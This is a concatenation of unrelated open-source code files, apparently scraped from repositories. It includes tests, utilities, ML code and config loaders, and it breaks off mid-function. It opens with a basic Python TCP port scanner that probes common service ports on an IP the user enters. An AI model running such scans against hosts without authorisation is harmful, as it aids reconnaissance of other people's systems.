"123" : "ntp",
"135" : "msrpc",
"139" : "netbios-ssn",
"143" : "imap",
"161" : "snmp",
"194" : "irc",
"443" : "https",
"445" : "microsoft-ds",
"993" : "imaps",
"1723" : "pptp",
"3306" : "mysql",
"5900" : "vnc",
"8080" : "http-proxy"
}
def check_port(ip, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        rslt = sock.connect_ex((ip, int(port)))
        sock.close()
        return rslt
    except:
        return 1
def scan(ip):
    open_ports = []
    for port in portlist:
        if check_port(ip, port) == 0:
            open_ports.append(port)
    return open_ports
def main():
    open_ports = []
    ip = str(input("Please enter the scanned IP address: "))
    start_time = time.time()
    open_ports = scan(ip)
    dur = round((time.time() - start_time), 2)
    num = len(open_ports)
    print(f"""\n
Scan Results for {ip}
{num} ports are open.
Scan lasted {dur} seconds.
------------------------------------\n""")
    for port in open_ports:
        portval = portlist[port]
        print(f"""{port} ---- {portval}\n""")
    print("------------------------------------\n")
if __name__ == "__main__":
    main()
|
bugtests/test339c.py | jeff5/jython-whinchat | 577 | 11186696 | import java
import test339c
class spam(java.lang.Object):
    pass
class eggs1(spam):
    pass
class eggs2(test339c.spam):
    pass
|
utils/misc.py | yihui-he2020/epipolar-transformers | 360 | 11186697 | import errno
import os
def mkdir(path):
    try:
        os.makedirs(path)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise
def prefix_dict(d, prefix):
    return {'/'.join([prefix, k]): v for k, v in d.items()}
|
tests/openbb_terminal/core/log/generation/test_settings.py | tehcoderer/GamestonkTerminal | 255 | 11186738 | <gh_stars>100-1000
from openbb_terminal.core.log.generation.settings import (
AppSettings,
AWSSettings,
LogSettings,
Settings,
)
def test_aws_settings():
    aws_access_key_id = "MOCK_AWS_ACCESS_KEY_ID"
    aws_secret_access_key = "MOCK_AWS_SECRET_ACCESS_KEY"
    aws_settings = AWSSettings(
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
    )
    assert aws_settings.aws_access_key_id == aws_access_key_id
    assert aws_settings.aws_secret_access_key == aws_secret_access_key
def test_app_settings():
    name = "MOCK_NAME"
    commit_hash = "MOCK_COMMIT_HASH"
    session_id = "MOCK_SESSION_ID"
    identifier = "MOCK_IDENTIFIER"
    app_settings = AppSettings(
        name=name,
        commit_hash=commit_hash,
        session_id=session_id,
        identifier=identifier,
    )
    assert app_settings.name == name
    assert app_settings.commit_hash == commit_hash
    assert app_settings.session_id == session_id
    assert app_settings.identifier == identifier
def test_log_settings(tmp_path):
    directory = tmp_path
    frequency = "MOCK_FREQUENCY"
    handler_list = "MOCK_HANDLER_LIST"
    rolling_clock = "MOCK_ROLLING_CLOCK"
    verbosity = 20
    log_settings = LogSettings(
        directory=directory,
        frequency=frequency,
        handler_list=handler_list,
        rolling_clock=rolling_clock,
        verbosity=verbosity,
    )
    assert log_settings.directory == directory
    assert log_settings.frequency == frequency
    assert log_settings.handler_list == handler_list
    assert log_settings.rolling_clock == rolling_clock
    assert log_settings.verbosity == verbosity
def test_settings(tmp_path):
    directory = tmp_path
    frequency = "MOCK_FREQUENCY"
    handler_list = "MOCK_HANDLER_LIST"
    rolling_clock = "MOCK_ROLLING_CLOCK"
    verbosity = 20
    log_settings = LogSettings(
        directory=directory,
        frequency=frequency,
        handler_list=handler_list,
        rolling_clock=rolling_clock,
        verbosity=verbosity,
    )
    name = "MOCK_NAME"
    commit_hash = "MOCK_COMMIT_HASH"
    session_id = "MOCK_SESSION_ID"
    identifier = "MOCK_IDENTIFIER"
    app_settings = AppSettings(
        name=name,
        commit_hash=commit_hash,
        session_id=session_id,
        identifier=identifier,
    )
    aws_access_key_id = "MOCK_AWS_ACCESS_KEY_ID"
    aws_secret_access_key = "MOCK_AWS_SECRET_ACCESS_KEY"
    aws_settings = AWSSettings(
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
    )
    settings = Settings(
        app_settings=app_settings,
        aws_settings=aws_settings,
        log_settings=log_settings,
    )
    assert settings.app_settings != app_settings
    assert settings.aws_settings != aws_settings
    assert settings.log_settings != log_settings
    assert isinstance(settings.app_settings, AppSettings)
    assert isinstance(settings.aws_settings, AWSSettings)
    assert isinstance(settings.log_settings, LogSettings)
|
pcdet/models/roi_heads/__init__.py | s-ryosky/ST3D | 184 | 11186749 | <gh_stars>100-1000
from .roi_head_template import RoIHeadTemplate
from .partA2_head import PartA2FCHead
from .pvrcnn_head import PVRCNNHead
from .second_head import SECONDHead
__all__ = {
'RoIHeadTemplate': RoIHeadTemplate,
'PartA2FCHead': PartA2FCHead,
'PVRCNNHead': PVRCNNHead,
'SECONDHead': SECONDHead
}
|
scenic/projects/fast_vit/tests/test_model_utils.py | techthiyanes/scenic | 688 | 11186750 | <filename>scenic/projects/fast_vit/tests/test_model_utils.py
"""Tests for model_utils.py."""
import functools
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import random
import jax.numpy as jnp
import numpy as np
from scenic.projects.fast_vit import model_utils
class AttentionLayersTest(parameterized.TestCase):
"""Tests for modules in model_utils.py."""
def test_linformer_encoder_self_attention(self):
"""Tests EncoderSelfAttention."""
rng = random.PRNGKey(0)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.LinformerEncoderAttention, num_heads=n_heads)
encoder_vars = encoder_self_attention_def().init(rng, x, deterministic=True)
y = encoder_self_attention_def().apply(encoder_vars, x, deterministic=True)
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
def test_linformer_encoder_self_attention_w_dropout(self):
"""Tests EncoderSelfAttention with dropout."""
rng = random.PRNGKey(0)
rng, dropout_rng = random.split(rng)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.LinformerEncoderAttention,
num_heads=n_heads,
dropout_rate=0.1)
encoder_vars = encoder_self_attention_def().init(rng, x, deterministic=True)
y = encoder_self_attention_def().apply(
encoder_vars, x, deterministic=False, rngs={'dropout': dropout_rng})
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
@parameterized.named_parameters([
('test_softmax', 'softmax'),
('test_generalized', 'generalized'),
])
def test_performer_encoder_self_attention(self, attention_fn_cls):
"""Tests PerformerEncoderAttention."""
rng = random.PRNGKey(0)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.PerformerEncoderAttention,
num_heads=n_heads,
attention_fn_cls=attention_fn_cls)
encoder_vars = encoder_self_attention_def().init(
rng, x, x, deterministic=True)
y = encoder_self_attention_def().apply(
encoder_vars, x, x, deterministic=True)
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
@parameterized.named_parameters([
('test_softmax', 'softmax'),
('test_generalized', 'generalized'),
])
def test_performer_encoder_self_attention_w_dropout(self, attention_fn_cls):
"""Tests PerformerEncoderAttention with dropout."""
rng = random.PRNGKey(0)
rng, dropout_rng = random.split(rng)
x = jnp.ones((4, 16, 32))
n_heads = 2
encoder_self_attention_def = functools.partial(
model_utils.PerformerEncoderAttention,
num_heads=n_heads,
attention_fn_cls=attention_fn_cls)
encoder_vars = encoder_self_attention_def().init(
rng, x, x, deterministic=True)
y = encoder_self_attention_def().apply(
encoder_vars, x, x, deterministic=False, rngs={'dropout': dropout_rng})
# Test outputs shape.
self.assertEqual(y.shape, x.shape)
@parameterized.named_parameters([('test_axi1', 1), ('test_axi2', 2)])
def test_axial_reshaping_utils(self, axis):
"""Tests fo get_axial_1d_input and get_axial_2d_input."""
input_shape = (4, 8, 16, 32) # Shape = `[bs, h, w, c]`
inputs_2d = jnp.array(np.random.normal(size=input_shape))
inputs_1d = model_utils.get_axial_1d_input(inputs_2d, axis=axis)
inputs_back_to_2d = model_utils.get_axial_2d_input(
inputs_1d, axis=axis, two_d_shape=input_shape)
self.assertTrue(jnp.array_equal(inputs_2d, inputs_back_to_2d))
class TopKTokenSelectorTest(parameterized.TestCase):
"""Tests for token selector module."""
@parameterized.named_parameters([
('pool_unselected', True, False, False, 6),
('only_selected', False, False, False, 5),
('pool_unselected_exclude_cls', True, True, False, 7),
('only_selected_exclude_cls', False, True, False, 6),
('pool_unselected_sample', True, False, True, 6),
('only_selected_sample', False, False, True, 5),
('pool_unselected_exclude_cls_sample', True, True, True, 7),
('only_selected_exclude_cls_sample', False, True, True, 6),
])
def test_top_k_selector(self,
pool_unselected_tokens,
exclude_cls,
sample_tokens,
expected_output_len):
"""Tests Top-K selector."""
rng, sample_rng = random.split(random.PRNGKey(0))
x = jnp.ones((4, 16, 32))
top_k = 5
top_selector = functools.partial(
model_utils.TopKTokenSelector,
top_k=top_k,
sample_tokens=sample_tokens,
pool_unselected_tokens=pool_unselected_tokens,
exclude_cls=exclude_cls,
)
variable = top_selector().init(rng, x, train=False)
y = top_selector().apply(
variable, x, train=True, rngs={'dropout': sample_rng})
# Test outputs shape.
expected_shape = (4, expected_output_len, 32)
self.assertEqual(y.shape, expected_shape)
@parameterized.named_parameters([
('replacement',
(32, 6, 10), 7, True, (32, 6, 7), False, False, False),
('replacement_nonunique',
(32, 6, 10), 11, None, (32, 6, 11), False, False, True),
('no_replacement',
(32, 6, 10), 10, False, (32, 6, 10), False, True, False),
('no_replacement_raises',
(32, 6, 10), 11, False, None, True, None, None),
])
def test_sample_categorial(self,
logit_shape,
num_samples,
replacement,
expected_shape,
expected_raise,
expected_unique,
expeted_nonunique):
"""Test categorial sampler."""
rng, sample_rng = random.split(random.PRNGKey(0))
logits = random.normal(rng, logit_shape)
kwargs = {}
if replacement is not None:
kwargs['replacement'] = replacement
if expected_raise:
with self.assertRaises(ValueError):
samples = model_utils.sample_categorical(
sample_rng, logits, num_samples, **kwargs)
else:
samples = model_utils.sample_categorical(
sample_rng, logits, num_samples, **kwargs)
self.assertEqual(samples.shape, expected_shape)
if expected_unique or expeted_nonunique:
samples = jnp.reshape(samples, (-1, expected_shape[-1]))
samples = jax.device_get(samples)
for sample in samples:
if expected_unique:
self.assertEqual(len(set(sample.tolist())), len(sample))
if expeted_nonunique:
self.assertLess(len(set(sample.tolist())), len(sample))
if __name__ == '__main__':
absltest.main()
|
smzdm/smzdm/smzdm/smzdm.py | jinzaizhichi/ledesoft | 1,491 | 11186784 | # coding: utf-8
import urllib
import urllib2
import re
import pdb
import os
import cookielib
import StringIO
import ConfigParser
class Smzdm:
    def __init__(self):
        self.cookies = cookielib.CookieJar()
        self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookies))
        self.headers = {
            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36',
            'Referer' : 'http://www.smzdm.com/',
            'Origin' : 'http://www.smzdm.com/'
        }
    # Log in
    def login(self, account):
        url = "https://zhiyou.smzdm.com/user/login/ajax_check"
        data = urllib.urlencode({
            'username' : account['username'],
            'password' : account['password'],
            'rememberme' : 'on',
            'redirect_url' : 'http://www.smzdm.com'
        })
        request = urllib2.Request(url, headers = self.headers, data = data)
        content = self.opener.open(request)
        return content
    # Log out
    def logout(self):
        url = "http://zhiyou.smzdm.com/user/logout"
        request = urllib2.Request(url, headers = self.headers)
        self.opener.open(request)
    # Daily check-in
    def checkin(self):
        url = "http://zhiyou.smzdm.com/user/checkin/jsonp_checkin"
        request = urllib2.Request(url, headers = self.headers)
        self.opener.open(request)
    # Check whether the check-in succeeded
    def is_checkin(self):
        url = "http://zhiyou.smzdm.com/user/info/jsonp_get_current?"
        request = urllib2.Request(url, headers = self.headers)
        response = self.opener.open(request)
        content = response.read()
        pattern = re.compile('\"has_checkin\"\:(.*?),')
        item = re.search(pattern, content)
        if item and item.group(1).strip() == 'true':
            os.system(' var=`date "+%Y-%m-%d %H:%M:%S"`;echo "${var} 自动签到成功" > /koolshare/smzdm/log')
        else:
            os.system(' var=`date "+%Y-%m-%d %H:%M:%S"`;echo "${var} 自动签到出错" > /koolshare/smzdm/log')
    def start_checkin(self):
        parser = ConfigParser.RawConfigParser()
        parser.read("/koolshare/smzdm/account.ini")
        for user in parser.sections():
            account = {}
            account['username'] = parser.get(user, 'username')
            account['password'] = parser.get(user, 'password')
            self.login(account)
            self.checkin()
            self.is_checkin()
            self.logout()
smzdm = Smzdm()
smzdm.start_checkin()
|
corehq/ex-submodules/pillowtop/management/commands/update_es_settings.py | dimagilg/commcare-hq | 471 | 11186834 | <reponame>dimagilg/commcare-hq<filename>corehq/ex-submodules/pillowtop/management/commands/update_es_settings.py
from django.core.management.base import BaseCommand, CommandError
from corehq.elastic import get_es_new
from corehq.pillows.utils import get_all_expected_es_indices
class Command(BaseCommand):
    help = "Update dynamic settings for existing elasticsearch indices."
    def add_arguments(self, parser):
        parser.add_argument(
            '--noinput',
            action='store_true',
            dest='noinput',
            default=False,
            help='Skip important confirmation warnings.'
        )
    def handle(self, **options):
        noinput = options.pop('noinput')
        es_indices = list(get_all_expected_es_indices())
        to_update = []
        es = get_es_new()
        for index_info in es_indices:
            old_settings = es.indices.get_settings(index=index_info.index)
            old_number_of_replicas = int(
                old_settings[index_info.index]['settings']['index']['number_of_replicas']
            )
            new_number_of_replicas = index_info.meta['settings']['number_of_replicas']
            if old_number_of_replicas != new_number_of_replicas:
                print("{} [{}]:\n Number of replicas changing from {!r} to {!r}".format(
                    index_info.alias, index_info.index, old_number_of_replicas, new_number_of_replicas))
                to_update.append((index_info, {
                    'number_of_replicas': new_number_of_replicas,
                }))
        if not to_update:
            print("There is nothing to update.")
            return
        if (noinput or _confirm(
                "Confirm that you want to update all the settings above?")):
            for index_info, settings in to_update:
                mapping_res = es.indices.put_settings(index=index_info.index, body=settings)
                if mapping_res.get('acknowledged', False):
                    print("{} [{}]:\n Index settings successfully updated".format(
                        index_info.alias, index_info.index))
                else:
                    print(mapping_res)
def _confirm(message):
    if input(
        '{} [y/n]'.format(message)
    ).lower() == 'y':
        return True
    else:
        raise CommandError('abort')
|
SSR-Net/data/TYY_IMDBWIKI_create_db.py | bleakie/MaskInsightface | 269 | 11186869 | <reponame>bleakie/MaskInsightface
import numpy as np
import cv2
import os
import csv
import argparse
from tqdm import tqdm
from TYY_utils import get_meta
def get_args():
    parser = argparse.ArgumentParser(description="This script cleans-up noisy labels "
                                                 "and creates database for training.",
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("--output", "-o", type=str, default='/home/sai/YANG/datasets/face_datasets/wiki/',
                        help="path to output database mat file")
    parser.add_argument("--input", type=str, default="/home/sai/YANG/datasets/face_datasets/wiki/gender_age_bbox_crop/",
                        help="dataset; wiki or imdb")
    parser.add_argument("--img_size", type=int, default=112,
                        help="output image size")
    parser.add_argument("--min_score", type=float, default=1.0,
                        help="minimum face_score")
    parser.add_argument("--label", type=str, default='/home/sai/YANG/datasets/face_datasets/wiki/label.csv',
                        help="path to output database mat file")
    args = parser.parse_args()
    return args
def main_gender_age():
    args = get_args()
    labelList = csv.reader(open(args.label, "rt", encoding="utf-8-sig"))
    out_ages = []
    out_imgs = []
    out_genders = []
    for row in labelList:
        true_age = row[2]
        true_gender = row[1]
        img_id = row[0]
        img_path = os.path.join(args.input, img_id)
        img = cv2.imread(img_path)
        if img is None:
            continue
        out_genders.append(int(true_gender))
        out_ages.append(int(true_age))
        out_imgs.append(cv2.resize(img, (args.img_size, args.img_size)))
    print('len:', len(out_imgs))
    np.savez('train_data/wiki_bbox_crop.npz', image=np.array(out_imgs), gender=np.array(out_genders), age=np.array(out_ages), img_size=args.img_size)
def main_csv():
    args = get_args()
    output_path = args.output
    db = args.input
    min_score = args.min_score
    mat_path = os.path.join(db, "{}.mat".format('wiki'))
    full_path, dob, gender, photo_taken, face_score, second_face_score, age = get_meta(mat_path, 'wiki')
    output_data = []
    for i in tqdm(range(len(face_score))):
        if face_score[i] < min_score:
            continue
        if (~np.isnan(second_face_score[i])) and second_face_score[i] > 0.0:
            continue
        if ~(0 <= age[i] <= 100):
            continue
        if np.isnan(gender[i]):
            continue
        img_id = str(full_path[i][0])
        save_path = os.path.join(output_path, img_id.split('/')[1])
        img_path = os.path.join(db, str(full_path[i][0]))
        import shutil
        shutil.copy(img_path, save_path)
        output_data.append({'gender': gender[i], 'age': age[i], 'id': img_id.split('/')[1]})
    with open(args.label, 'w') as f:
        headers = ['id', 'gender', 'age']
        f_scv = csv.DictWriter(f, headers)
        f_scv.writeheader()
        f_scv.writerows(np.array(output_data))
if __name__ == '__main__':
    main_gender_age()
|
mlens/index/temporal.py | mehrdad-shokri/mlens | 760 | 11186872 | <filename>mlens/index/temporal.py<gh_stars>100-1000
"""ML-ENSEMBLE
:author: <NAME>
:copyright: 2017-2018
:licence: MIT
Temporal (time series) indexing.
"""
from __future__ import division
from numbers import Integral
import numpy as np
from .base import BaseIndex
from ._checks import check_temporal_index
class TemporalIndex(BaseIndex):
"""Indexer that generates time series fold over ``X``.
Sequential iterator that generates fold index tuples that preserve
time series structure of data. Consequently, test folds always contain
"future" observations (i.e. higher index values).
The generator returns a tuple of stop and start positions to be used
for numpy array slicing [stop:start].
.. versionadded:: 0.2.3
Parameters
----------
step_size : int (default=1)
number of samples to use in each test fold. The final window
size may be smaller if too few observations remain.
burn_in : int (default=None)
number of samples to use for first training fold. These observations
will be dropped from the output. Defaults to ``step_size``.
window: int (default=None)
number of previous samples to use in each training fold, except first
which is determined by ``burn_in``. If ``None``, will use all previous
observations.
lag: int (default=0)
distance between the most recent training point in the training fold and
the first test point. For ``lag>0``, the training fold and the test fold
will not be contiguous.
X : array-like of shape [n_samples,] , optional
the training set to partition. The training label array is also,
accepted, as only the first dimension is used. If ``X`` is not
passed at instantiating, the ``fit`` method must be called before
``generate``, or ``X`` must be passed as an argument of
``generate``.
raise_on_exception : bool (default=True)
whether to warn on suspicious slices or raise an error.
See Also
--------
:class:`FoldIndex`, :class:`BlendIndex`, :class:`SubsetIndex`
Examples
--------
>>> import numpy as np
>>> from mlens.index import TemporalIndex
>>> X = np.arange(10)
>>> print("Data set: %r" % X)
>>> print()
>>>
>>> idx = TemporalIndex(2, X=X)
>>>
>>> for train, test in idx.generate(as_array=True):
... print('TRAIN IDX: %32r | TEST IDX: %16r' % (train, test))
>>>
>>> print()
>>>
>>> for train, test in idx.generate(as_array=True):
... print('TRAIN SET: %32r | TEST SET: %16r' % (X[train], X[test]))
>>>
>>> for train_idx, test_idx in idx.generate(as_array=True):
... assert max(train_idx) <= min(test_idx)
>>>
>>> print()
>>>
>>> print("No overlap between train set and test set.")
Data set: array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
TRAIN IDX: array([0, 1]) | TEST IDX: array([2, 3, 4, 5, 6, 7, 8, 9])
TRAIN IDX: array([0, 1, 2, 3]) | TEST IDX: array([4, 5, 6, 7, 8, 9])
TRAIN IDX: array([0, 1, 2, 3, 4, 5]) | TEST IDX: array([6, 7, 8, 9])
TRAIN IDX: array([0, 1, 2, 3, 4, 5, 6, 7]) | TEST IDX: array([8, 9])
TRAIN SET: array([0, 1]) | TEST SET: array([2, 3, 4, 5, 6, 7, 8, 9])
TRAIN SET: array([0, 1, 2, 3]) | TEST SET: array([4, 5, 6, 7, 8, 9])
TRAIN SET: array([0, 1, 2, 3, 4, 5]) | TEST SET: array([6, 7, 8, 9])
TRAIN SET: array([0, 1, 2, 3, 4, 5, 6, 7]) | TEST SET: array([8, 9])
No overlap between train set and test set.
"""
def __init__(self, step_size=1, burn_in=None, window=None, lag=0, X=None, raise_on_exception=True):
super(TemporalIndex, self).__init__()
self.step_size = step_size
self.burn_in = burn_in if burn_in is not None else step_size
self.window = window
self.lag = lag
self.raise_on_exception = raise_on_exception
if X is not None:
self.fit(X)
def fit(self, X, y=None, job=None):
"""Method for storing array data.
Parameters
----------
X : array-like of shape [n_samples, optional]
array to _collect dimension data from.
y : None
for compatibility
job : None
for compatibility
Returns
-------
instance :
indexer with stores sample size data.
"""
self.n_samples = X.shape[0]
check_temporal_index(
self.burn_in, self.step_size, self.window,
self.lag, self.n_samples, self.raise_on_exception)
self.n_test_samples = self.n_samples - self.burn_in
self.__fitted__ = True
return self
def _gen_indices(self):
"""Generate Time series folds"""
idx = self.burn_in
stop = False
burn_in = True
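# First fold trains on the burn-in window; later folds advance the test window by step_size
# and train on all (or at most `window`) samples ending `lag` steps before the test start.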
while not stop:
train_stop = idx - self.lag
if burn_in:
train_start = 0
burn_in = False
elif self.window is None:
train_start = 0
else:
train_start = max(idx - self.window - self.lag, 0)
test_start = idx
test_stop = min(idx + self.step_size, self.n_samples)
train_index = (train_start, train_stop)
test_index = (test_start, test_stop)
yield train_index, test_index
idx += self.step_size
if idx >= self.n_samples:
stop = True
|
test/python/algorithms/evolvers/test_evolution_result.py | ikkoham/qiskit-core | 1,456 | 11186884 | <gh_stars>1000+
# This code is part of Qiskit.
#
# (C) Copyright IBM 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Class for testing evolution result."""
import unittest
from test.python.algorithms import QiskitAlgorithmsTestCase
from qiskit.algorithms.evolvers.evolution_result import EvolutionResult
from qiskit.opflow import Zero
class TestEvolutionResult(QiskitAlgorithmsTestCase):
    """Class for testing evolution result and relevant metadata."""
    def test_init_state(self):
        """Tests that a class is initialized correctly with an evolved_state."""
        evolved_state = Zero
        evo_result = EvolutionResult(evolved_state=evolved_state)
        expected_state = Zero
        expected_aux_ops_evaluated = None
        self.assertEqual(evo_result.evolved_state, expected_state)
        self.assertEqual(evo_result.aux_ops_evaluated, expected_aux_ops_evaluated)
    def test_init_observable(self):
        """Tests that a class is initialized correctly with an evolved_observable."""
        evolved_state = Zero
        evolved_aux_ops_evaluated = [(5j, 5j), (1.0, 8j), (5 + 1j, 6 + 1j)]
        evo_result = EvolutionResult(evolved_state, evolved_aux_ops_evaluated)
        expected_state = Zero
        expected_aux_ops_evaluated = [(5j, 5j), (1.0, 8j), (5 + 1j, 6 + 1j)]
        self.assertEqual(evo_result.evolved_state, expected_state)
        self.assertEqual(evo_result.aux_ops_evaluated, expected_aux_ops_evaluated)
if __name__ == "__main__":
    unittest.main()
|
PyObjCTest/test_nsindexset.py | Khan/pyobjc-framework-Cocoa | 132 | 11186895 | <gh_stars>100-1000
from PyObjCTools.TestSupport import *
from Foundation import *
class TestNSIndexSet (TestCase):
    def testMethods(self):
        self.assertResultIsBOOL(NSIndexSet.isEqualToIndexSet_)
        self.assertResultIsBOOL(NSIndexSet.containsIndex_)
        self.assertResultIsBOOL(NSIndexSet.containsIndexesInRange_)
        self.assertResultIsBOOL(NSIndexSet.containsIndexes_)
        self.assertResultIsBOOL(NSIndexSet.intersectsIndexesInRange_)
        self.assertArgIsOut(NSIndexSet.getIndexes_maxCount_inIndexRange_, 0)
        self.assertArgSizeInArg(NSIndexSet.getIndexes_maxCount_inIndexRange_, 0, 1)
        self.assertArgSizeInResult(NSIndexSet.getIndexes_maxCount_inIndexRange_, 0)
    @min_os_level('10.6')
    def testMethods10_6(self):
        self.assertArgIsBlock(NSIndexSet.enumerateIndexesUsingBlock_, 0,
            b'v' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.enumerateIndexesWithOptions_usingBlock_, 1,
            b'v' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgHasType(NSIndexSet.enumerateIndexesInRange_options_usingBlock_, 0, NSRange.__typestr__)
        self.assertArgIsBlock(NSIndexSet.enumerateIndexesInRange_options_usingBlock_, 2,
            b'v' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.indexPassingTest_, 0,
            objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.indexWithOptions_passingTest_, 1,
            objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgHasType(NSIndexSet.indexInRange_options_passingTest_, 0, NSRange.__typestr__)
        self.assertArgIsBlock(NSIndexSet.indexInRange_options_passingTest_, 2,
            objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.indexesPassingTest_, 0,
            objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.indexesWithOptions_passingTest_, 1,
            objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
        self.assertArgHasType(NSIndexSet.indexesInRange_options_passingTest_, 0, NSRange.__typestr__)
        self.assertArgIsBlock(NSIndexSet.indexesInRange_options_passingTest_, 2,
            objc._C_NSBOOL + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)
    @min_os_level('10.7')
    def testMethod10_7(self):
        self.assertArgIsBlock(NSIndexSet.enumerateRangesUsingBlock_, 0,
            b'v' + NSRange.__typestr__ + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.enumerateRangesWithOptions_usingBlock_, 1,
            b'v' + NSRange.__typestr__ + b'o^' + objc._C_NSBOOL)
        self.assertArgIsBlock(NSIndexSet.enumerateRangesInRange_options_usingBlock_, 2,
            b'v' + NSRange.__typestr__ + b'o^' + objc._C_NSBOOL)
if __name__ == "__main__":
    main()
|
hooks/gin_config_hook_builder.py | slowy07/tensor2robot | 456 | 11186902 | # coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Builds hooks that write out the operative gin configuration.
"""
from typing import List
from absl import logging
import gin
from tensor2robot.hooks import hook_builder
from tensor2robot.models import model_interface
import tensorflow as tf
@gin.configurable
class GinConfigLoggerHook(tf.estimator.SessionRunHook):
"""A SessionRunHook that logs the operative config to stdout."""
def __init__(self, only_once=True):
self._only_once = only_once
self._written_at_least_once = False
def after_create_session(self, session=None, coord=None):
"""Logs Gin's operative config."""
if self._only_once and self._written_at_least_once:
return
logging.info('Gin operative configuration:')
for gin_config_line in gin.operative_config_str().splitlines():
logging.info(gin_config_line)
self._written_at_least_once = True
@gin.configurable
class OperativeGinConfigLoggerHookBuilder(hook_builder.HookBuilder):
def create_hooks(
self,
t2r_model,
estimator,
):
return [GinConfigLoggerHook()]
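# Illustrative usage sketch, not part of the original module: `estimator` and
# `train_input_fn` below are assumed to exist elsewhere. The returned hook can
# be passed to an estimator training call so that the operative gin config is
# logged once the session is created, e.g.
#
#     hooks = OperativeGinConfigLoggerHookBuilder().create_hooks(t2r_model, estimator)
#     estimator.train(input_fn=train_input_fn, hooks=hooks)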
|
examples/PyObjC/ICSharingWatcher/TableModelAppDelegate.py | flupke/py2app | 193 | 11186934 | <reponame>flupke/py2app
import os
from Cocoa import *
import objc
import leases
FILENAME = '/var/db/dhcpd_leases'
def getLeases(fn):
if os.path.exists(fn):
lines = file(fn, 'U')
else:
lines = leases.EXAMPLE.splitlines()
return list(leases.leases(lines))
class TableModelAppDelegate (NSObject):
mainWindow = objc.IBOutlet()
def awakeFromNib(self):
self.timer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(1.0, self, 'pollLeases:', {}, True)
def pollLeases_(self, timer):
if not os.path.exists(FILENAME):
return
d = timer.userInfo()
newtime = os.stat(FILENAME).st_mtime
oldtime = d.get('st_mtime', 0)
if newtime > oldtime:
d['st_mtime'] = newtime
self.setLeases_(getLeases(FILENAME))
def leases(self):
if not hasattr(self, '_cachedleases'):
self._cachedleases = getLeases(FILENAME)
return self._cachedleases
def setLeases_(self, leases):
self._cachedleases = leases
def windowWillClose_(self, sender):
if sender is self.mainWindow:
NSApp().terminate()
|
zentral/conf/config.py | janheise/zentral | 634 | 11186939 | <reponame>janheise/zentral
import base64
import itertools
import json
import logging
import os
import re
import time
from .buckets import get_bucket_client
from .params import get_param_client
from .secrets import get_secret_client
logger = logging.getLogger("zentral.conf.config")
class Proxy:
pass
class EnvProxy(Proxy):
def __init__(self, name):
self._name = name
def get(self):
return os.environ[self._name]
class ResolverMethodProxy(Proxy):
def __init__(self, resolver, proxy_type, key):
if proxy_type == "file":
self._method = resolver.get_file_content
elif proxy_type == "param":
self._method = resolver.get_parameter_value
elif proxy_type == "secret":
self._method = resolver.get_secret_value
elif proxy_type == "bucket_file":
self._method = resolver.get_bucket_file
else:
raise ValueError("Unknown proxy type %s", proxy_type)
self._key = key
def get(self):
return self._method(self._key)
class JSONDecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return json.loads(self._child_proxy.get())
class Base64DecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return base64.b64decode(self._child_proxy.get())
class ElementFilter(Proxy):
def __init__(self, key, child_proxy):
try:
self._key = int(key)
except ValueError:
self._key = key
self._child_proxy = child_proxy
def get(self):
return self._child_proxy.get()[self._key]
class Resolver:
def __init__(self):
self._cache = {}
self._bucket_client = None
self._param_client = None
self._secret_client = None
def _get_or_create_cached_value(self, key, getter, ttl=None):
# happy path
try:
expiry, value = self._cache[key]
except KeyError:
pass
else:
if expiry is None or time.time() < expiry:
logger.debug("Key %s from cache", key)
return value
logger.debug("Cache for key %s has expired", key)
# get value
